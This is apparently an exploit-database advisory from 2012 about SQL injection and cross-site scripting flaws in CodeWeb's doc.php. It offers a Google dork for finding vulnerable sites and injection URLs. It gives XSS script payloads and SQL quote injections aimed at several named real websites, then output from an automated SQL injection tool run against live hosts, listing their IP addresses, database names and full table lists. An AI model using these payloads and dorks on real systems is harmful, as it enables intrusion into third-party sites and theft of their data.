id: 20029
date: 12/22/2012
title: CodeWeb SQL/XSS Vulnerabilies
author: TUNISIAN CYBER
cves: 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm TUNISIAN CYBER member from Inj3ct0r Team           1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Author: TUNISIAN CYBER
[+] Home: 1337day.com Inj3ct0r Exploit DataBase
[+] Exploit Title:  CodeWeb Multiple  Vulnerabilies (SQL/XSS)
[+] Date: 22-12-2012
[+] Category: WebApp
[+] Google Dork: intext:"Designed by COMASE INFO" doc.php
                 intext:"Designed by COMASE INFO"
[+] Tested on: Windows 7 Professionnel 
[+] Vendor: http://www.groupecomase.com
[+] Twitter: @a0a0a5
####################################################################################
 
 
#################################################################################
|||                         ~~ Use It At Your Own Risk ~~                     |||
|||                    It's For Educational Purpos Only                       |||
|||                    I'm not Responsible For Any Damage                     |||
#################################################################################
 
Vulnerability Details:
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
 

Vulnerability Details:
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser. 
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application. 


==============================
Vulnerabilies:
127.0.0.1/doc.php?id=ro1&tid=7&site='"[XSS]
127.0.0.1/doc.php?id=to8&tid=8&docid=[SQL]


 
Demos:

http://www.adem.eu//doc.php?id=to8&tid=8&docid=25'
http://www.adem.eu//doc.php?id=ro1&tid=7&site='"--></style></script><script>alert(0x000855)</script>

http://www.vnsafety.eu//doc.php?id=to8&tid=8&docid=25'
http://www.vnsafety.eu//doc.php?id=ro1&tid=7&site='"--></style></script><script>alert(0x000855)</script>


http://www.s-mi.be/doc.php?id=to8&tid=8&docid=25'
http://www.s-mi.be/doc.php?id=ro1&tid=7&site='"--></style></script><script>alert(0x000855)</script>

http://www.promemploi.be/doc.php?id=to9'
http://www.promemploi.be/doc.php?id=ro1&tid=7&site='"--></style></script><script>alert(0x000855)</script>

http://www.groupecomase.com/doc.php?id=ro78&tid=22&site=3'
http://www.groupecomase.com/doc.php?id=ro1&tid=7&site='"--></style></script><script>alert(0x000855)</script>

Examples of 3xpl01t1ng:
 
+-------------------------------------+
Analyzing http://www.ginion.be/doc.php?id=to8&tid=8&docid=25'
Host IP: 80.80.228.60
Web Server: Apache
Keyword Found: mysql_query
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 9
Finding string column
Valid String Column is 1
Target Vulnerable :D
Current DB: ginion
 
+-------------------------------------+
Analyzing http://www.adem.eu//doc.php?id=to8&tid=8&docid=25'
Host IP: 195.238.0.75
Web Server: Apache/2.2.3 (Debian)
Powered-by: PHP/4.4.4-8+etch6
Keyword Found: mysql_query
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 9
Finding string column
Valid String Column is 1
Target Vulnerable :D
Current DB: adem
+-------------------------------------+
 
+--------------------+
Tables Name: codes,comm,doc_p,doc_u,fic,infodefil,interet_choix,interet_enreg,interet_form,libinfodefil,listes,lkcomm_p,lkcomm_u,lkdoc_p,lkdoc_u,lkfamille,lkfic_p,lkfic_u,lkmnuth,lkpave,lkthrub,lkurl,mailingint,mailinglist,menus,news_archives,news_articles,news_envois,news_letters,news_param,param,pave,pays,prod_acheteur,prod_cde,prod_cdeligne,prod_cdeparam,prod_famille,prod_famille_upd,prod_fiche,prod_fiche_upd,prod_livraison,prod_rechprix,rubriq,sitenew,sondage_quest,sondage_rep,ssrubriq,themes,url,user,vcx

+--------------------+

 
>>Thanks To All TN Hackers and 1337day team<<

#  0day.today [2023-03-25]  #